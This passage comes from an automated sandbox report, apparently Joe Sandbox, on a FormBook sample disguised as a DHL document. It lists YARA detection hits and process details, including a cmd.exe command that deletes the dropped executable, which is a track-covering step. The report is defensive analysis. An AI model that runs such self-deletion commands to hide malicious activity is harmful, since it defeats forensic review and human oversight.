            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high

            General

            Start time:18:55:14
            Start date:02/12/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
            Imagebase:0x150000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:18:55:16
            Start date:02/12/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7ecfc0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Disassembly

            Code Analysis
